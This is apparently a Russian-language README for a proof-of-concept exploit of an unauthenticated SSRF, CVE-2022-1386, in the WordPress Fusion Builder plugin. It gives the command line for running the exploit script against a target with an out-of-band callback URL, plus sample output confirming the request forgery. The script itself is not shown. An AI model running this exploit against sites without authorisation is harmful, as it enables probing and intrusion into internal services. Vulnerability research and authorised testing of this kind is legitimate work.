
PoC неаутентифицированного SSRF в WordPress Fusion Builder <3.6.2 (CVE-2022-1386)
Неаутентифицированная Server-Side Request Forgery (SSRF) в плагине Fusion Builder (используется темой Avada для WordPress) до версии 3.6.2.
Позволяет атакующим отправлять HTTP-запросы на произвольные URL-адреса, потенциально нацеливаясь на внутренние сервисы.
admin-ajax.phppython3 exploit_cve_2022_1386.py <target_url> <your_callback_url>
Пример:
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
Используйте Interact.sh или [Burp Collaborator] для получения callback.
📋 Пример вывода
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
📌 Примечания Данный PoC не занимается эксфильтрацией данных. Только этическое использование: не эксплуатируйте системы без авторизации.
📚 Ссылки https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b https://theme-fusion.com/documentation/avada/fusion-builder-changelog/